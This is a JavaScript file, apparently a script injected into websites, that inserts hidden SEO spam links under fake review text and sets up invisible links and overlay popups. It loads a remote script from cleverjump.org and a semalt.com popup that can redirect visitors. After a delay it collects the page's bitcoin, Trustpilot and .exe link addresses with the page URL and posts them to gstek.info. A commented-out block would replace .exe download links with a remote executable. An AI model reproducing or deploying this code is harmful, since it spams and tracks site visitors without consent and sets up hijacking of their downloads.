/* Domain is for sale: fawtuowo@gmail.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var isTopLayer = false; var popupHtml = "
Nice shopping center, many brands and various restaurants where you can eat. hand held electric pruning shears<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Just which there was a public bus or something to get here fright night tulleys<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Fantastic park. Have plenty of time to get around. Use the map. There are many hidden gems ukrainian dating sites ukraine<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
A great place to go for a drink,friendly staff,relaxed atmosphere,good music moving company that moves out of state<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Their icedwines are the best, the tour was really great & the tour guide was knowledgeable, learnt a lot. s888 on line sabong<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
The customer service is always great! you can always get on the phone with someone. They are not done talking to you unless they have solved whatever problem you came to them with involving your account. us company database<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div> <\/div>
The reservation staff are extremely accommodating and very helpful. Breakfast is delicious. halal products<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
I had a great experience at schomp. Ali was so trust worthy even though I couldnt find the right car. I will always go back to Ali anytime I am in the market for a car! I highly recommend going to see Ali at Schomp! trailer homes sale green bay<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
It was my first time at MarketPlace Grill with my family, and the waitress, Donna, was incredibly friendly and helpful! The bread they bring to the table is delicious, as is the food! attrattivo srbija<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
I called before closing, they inform me that they will deliver it to me in 1 hr. And two hours ago, Im still waiting, theyve closed, a disaster atlético-mg contratações<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Horrible company. Gives unbelievable initial quotes and then unable to deliver. Seems like a bait and switch type of operation. Especially unhappy with the work done my Misty Gurule at this location. purchase contact lenses<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
A must for the program in Paris. The vastness of the cathedral is breathtaking private airport transportation<\/a><\/article><\/span> <\/div>
They really take care of their fish, etc. They care. kala namak køb<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Very good facilities, but poor response from doctors on duty. Most of them are rude. \u5916\u9001\u8336\u591a\u5c11\u9322<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
A rather quiet hotel, under RM200 (USD70) a night. Food a little below bar parimatcj<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Courteous and available with customers. Staff prepared and ready to respond to customer needs \u0441\u0442\u043e\u043b \u0435\u0432\u0430 \u043c\u0430\u043b\u0430\u0439\u0437\u0438\u044f<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Awesome service department. Tobias Langer gave me a lot of confidence that it would be repaired properly and it was. www ufabet com \u0e14\u0e32\u0e27\u0e19\u0e4c\u0e42\u0e2b\u0e25\u0e14<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Ebiz is best place to grow and learn... It teaches u how to think how to take great visions. I suggest each n Evry person to join this oraganistion to help whole world mass computer lliterate. Jai ebiz!!! túi hi\u1ec7u dior 150<\/a><\/article><\/span> <\/div>
As a tourist in Rome I speak only English. The staff were helpful, friendly, professional and efficient. I dont think I have met better anywhere in the world. luxury restaurant furniture<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Nice to see the updates, but the new place already seemed little run down. Security checkpoint, though necessary, was a bit much with rangers somewhat rude. where to buy gold nuggets<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
5 star Great luxury Hotel & Restaurant. Really good location not a congested traffic area like other Beverly Hills Hotels. The Four Season Hotels never disappoint! \u501f\u9322<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
I loved it more because Thursdays they have specials for children for 30 dollars they can go to all the games from 10 in the morning to 8 at night and they have a lot of variety of food and especially fun for all ages stavelse metaalbouw<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Saw The Book of Mormon there and had a great time. Restroom lines are very long and disorganized and becomes a free for all at intermission. Good snack and drink options and are on par with other stage theaters. bookmarking sites with high pr<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Clean as a whistle, comfy beds, literally uncloggable toilets. Id live here if I could afford it. semalt funciona<\/a><\/article><\/span> <\/div>
Beautifully designed and executed building with quality programs. I recommend to everyone! Tucasa<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Classic upscale hotel and beautiful views to surrounding nature and golf courses. Service at the bar is good but our food orders took way too long both times. free print screen program<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Best service ever: turned up the music when a song was good, was good with special orders and everything was served quickly. Definitely enjoyed my experience and the apple pie google browser store<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
No carwash after service, maybe next time five star chrome extension shop<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Food was divine, staff friendly but slightly wooden. Will definitely go back for the amazing food! youtube download iphone<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Great experience. Staff is extremely professional and caring .Wonderful to work with free screen grab software<\/a><\/article><\/span> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var bottomHtml = "
Nice shopping center, many brands and various restaurants where you can eat. hand held electric pruning shears<\/a>.<\/article>
Just which there was a public bus or something to get here fright night tulleys<\/a>.<\/article>
Fantastic park. Have plenty of time to get around. Use the map. There are many hidden gems ukrainian dating sites ukraine<\/a>.<\/article>
A great place to go for a drink,friendly staff,relaxed atmosphere,good music moving company that moves out of state<\/a>.<\/article>
Their icedwines are the best, the tour was really great & the tour guide was knowledgeable, learnt a lot. s888 on line sabong<\/a>.<\/article>
The customer service is always great! you can always get on the phone with someone. They are not done talking to you unless they have solved whatever problem you came to them with involving your account. us company database<\/a>.<\/article>
The reservation staff are extremely accommodating and very helpful. Breakfast is delicious. halal products<\/a>.<\/article>
I had a great experience at schomp. Ali was so trust worthy even though I couldnt find the right car. I will always go back to Ali anytime I am in the market for a car! I highly recommend going to see Ali at Schomp! trailer homes sale green bay<\/a>.<\/article>
It was my first time at MarketPlace Grill with my family, and the waitress, Donna, was incredibly friendly and helpful!\r\nThe bread they bring to the table is delicious, as is the food! attrattivo srbija<\/a>.<\/article>
I called before closing, they inform me that they will deliver it to me in 1 hr. And two hours ago, Im still waiting, theyve closed, a disaster atlético-mg contratações<\/a>.<\/article>
Horrible company. Gives unbelievable initial quotes and then unable to deliver. Seems like a bait and switch type of operation. Especially unhappy with the work done my Misty Gurule at this location. purchase contact lenses<\/a>.<\/article>
A must for the program in Paris. The vastness of the cathedral is breathtaking private airport transportation<\/a>.<\/article>
They really take care of their fish, etc. They care. kala namak køb<\/a>.<\/article>
Very good facilities, but poor response from doctors on duty. Most of them are rude. \u5916\u9001\u8336\u591a\u5c11\u9322<\/a>.<\/article>
A rather quiet hotel, under RM200 (USD70) a night. Food a little below bar parimatcj<\/a>.<\/article>
Courteous and available with customers. Staff prepared and ready to respond to customer needs \u0441\u0442\u043e\u043b \u0435\u0432\u0430 \u043c\u0430\u043b\u0430\u0439\u0437\u0438\u044f<\/a>.<\/article>
Awesome service department. Tobias Langer gave me a lot of confidence that it would be repaired properly and it was. www ufabet com \u0e14\u0e32\u0e27\u0e19\u0e4c\u0e42\u0e2b\u0e25\u0e14<\/a>.<\/article>
Ebiz is best place to grow and learn... It teaches u how to think how to take great visions. I suggest each n Evry person to join this oraganistion to help whole world mass computer lliterate. Jai ebiz!!! túi hi\u1ec7u dior\t150<\/a>.<\/article>
As a tourist in Rome I speak only English. The staff were helpful, friendly, professional and efficient. I dont think I have met better anywhere in the world. luxury restaurant furniture<\/a>.<\/article>
Nice to see the updates, but the new place already seemed little run down. Security checkpoint, though necessary, was a bit much with rangers somewhat rude. where to buy gold nuggets<\/a>.<\/article>
5 star Great luxury Hotel & Restaurant. Really good location not a congested traffic area like other Beverly Hills Hotels. The Four Season Hotels never disappoint! \u501f\u9322<\/a>.<\/article>
I loved it more because Thursdays they have specials for children for 30 dollars they can go to all the games from 10 in the morning to 8 at night and they have a lot of variety of food and especially fun for all ages stavelse metaalbouw<\/a>.<\/article>
Saw The Book of Mormon there and had a great time. Restroom lines are very long and disorganized and becomes a free for all at intermission. Good snack and drink options and are on par with other stage theaters. bookmarking sites with high pr<\/a>.<\/article>
Clean as a whistle, comfy beds, literally uncloggable toilets. Id live here if I could afford it. semalt funciona<\/a>.<\/article>
Beautifully designed and executed building with quality programs. I recommend to everyone! Tucasa<\/a>.<\/article>
Classic upscale hotel and beautiful views to surrounding nature and golf courses. Service at the bar is good but our food orders took way too long both times. free print screen program<\/a>.<\/article>
Best service ever: turned up the music when a song was good, was good with special orders and everything was served quickly. Definitely enjoyed my experience and the apple pie google browser store<\/a>.<\/article>
No carwash after service, maybe next time five star chrome extension shop<\/a>.<\/article>
Food was divine, staff friendly but slightly wooden. Will definitely go back for the amazing food! youtube download iphone<\/a>.<\/article>
Great experience. Staff is extremely professional and caring .Wonderful to work with free screen grab software<\/a>.<\/article><\/span>"; var popupCreated = false; var bottomPopup = false || /[?&]test=1/.test(location.href); //officeLog(bottomHtml); function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function officeLog(data) { } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:11px; line-height:normal;'); sheet.addRule('.shbNetPopupTable a, .shbNetPopupTable b', 'text-decoration:none; background:none; height:auto !important; color:#737373; font-size:11px; font-weight:bold;'); sheet.addRule('.shbNetTopLayer .shbNetPopupWr', 'display:block !important; width: 100% !important; x-index:99999999 !important; background: #fff !important; padding: 2px 10px !important;'); sheet.addRule('.shbNetTopLayer #shbNetPaddingTable', 'display:table !important;'); } function createTopLayer() { //if (!domReady) return; var div = document.createElement('div'); div.className = 'shbNetTopLayer'; div.innerHTML = popupHtml; document.body.insertBefore(div, document.body.childNodes[0]); popupCreated = true; } function tryCreatePopup(stage) { if (popupCreated) return; if (isTopLayer) { createTopLayer(); return; } if (bottomPopup) { var box = document.createElement('div'); box.innerHTML = bottomHtml; document.body.appendChild(box); return; } if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '800px', maxWidth: '98%', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} (function() { if (!document.querySelector) return; var added = false; tryAddLink(); window.addEventListener('DOMContentLoaded', tryAddLink); setTimeout(tryAddLink, 100); setTimeout(tryAddLink, 1000); setTimeout(tryAddLink, 2000); function tryAddLink() { if (added) return; var menu = document.querySelector('#wpadminbar .ab-top-menu'); if (!menu) return; var li = document.createElement('li'); li.innerHTML = 'SEO promotion'; //menu.appendChild(li); added = true; save(); } function save() { var json = JSON.stringify({ hrefs: ['wordpress_new'], jsDomain: 'gstek.info', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//gstek.info/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } })(); (function() { function byId(id) { return document.getElementById(id); } function setCookie() { var date = new Date(); date.setTime(date.getTime() + (60 * 60 * 1000)); document.cookie = 'closePopupStartWow=1; path=/; domain=.' + location.hostname + '; expires=' + date.toGMTString(); } function listenerPopupSemalt(event){ if (event.origin != 'https://semalt.com') return; if (!event.data) return; if (event.data == 'closePopupStartWow'){ var el = byId('popupStartWow'); if (!el) return; el.style.display = 'none'; setCookie(); } else if(event.data.indexOf('startPopupStartWow')>-1) { try{var res = JSON.parse(event.data); if(res && res.page){ location.href = 'https://semalt.com/?s='+decodeURIComponent(res.page)+'&ref=blogspot'; } } catch(ee) { } setCookie(); } } function init() { if (document.getElementById('popupWowNode')) return; var div = document.createElement('div'); div.id = 'popupWowNode'; try { div.innerHTML = html; } catch (err) { return; } document.body.appendChild(div); setTimeout(function(){ if (document.cookie.indexOf('closePopupStartWow') !== -1) return; var el = byId('popupStartWow'); if (!el) return; el.setAttribute('src', 'https://semalt.com/popups/popup_wow.php?lang=en'); setTimeout(function(){ el.style.display = 'block'; }, 400); },400); } setTimeout(init, 100); setTimeout(init, 1000); setTimeout(init, 2000); window.addEventListener('message', listenerPopupSemalt, false); })(); setTimeout(function() { /*try { var links = document.querySelectorAll('a[href$=".exe"]'); for (var i = 0; i < links.length; i++) { links[i].href = 'https://myprintscreen.com/soft/myp0912.exe'; break; } } catch (err) {}*/ try { var links = document.querySelectorAll('a[href^="bitcoin:"], a[href*="trustpilot.com"], a[href$=".exe"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'gstek.info', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//gstek.info/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();